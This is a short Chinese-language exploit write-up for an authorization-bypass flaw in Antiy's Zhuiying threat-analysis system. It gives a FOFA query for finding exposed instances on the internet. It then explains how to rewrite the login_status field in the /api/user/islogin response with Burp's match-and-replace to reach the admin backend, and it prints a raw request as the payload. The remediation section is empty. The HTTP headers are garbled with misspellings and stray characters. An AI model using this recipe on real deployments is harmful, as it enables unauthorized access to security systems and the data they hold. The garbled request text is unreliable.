A3-1安天-追影威胁分析系统-PermissionAC
漏洞描述:
高级可持续威胁安全检测系统 存在越权访问漏洞,攻击者可以通过工具修改特定的返回包导致越权后台查看敏感信息。
网站图片:
网络测绘:
fofa语法:
title=“高级可持续威胁安全检测系统”
漏洞复现:
访问威胁分析系统,用bp查看请求包列表可以发现一条”/api/user/islogin"的请求。
将返回包中的"login_status"字段替换成"true”,可以使用bp的match and replace添加规则。
payload:
GET /api/user/islogin HTTP/1.1
Host:
Connection: close4
Accept: application/json, text/javascript,*/*; q=0.015
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML,like Gecko) Chrome/87.0.4280.88Safari/537.36
X-Requested-With: XMLHtpRequest7 Sec-Eetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding:gzip,deflate
Accept-Lanquage: zh-CN,zh;q=0.9
效果图:
请求 /api/user/islogin 时成功越过身份验证 。访问该系统就可以直接登陆。
修复建议:
参考链接:
https://mp.weixin.qq.com/s/zPiXd8bpOLhfVfUcEcs4og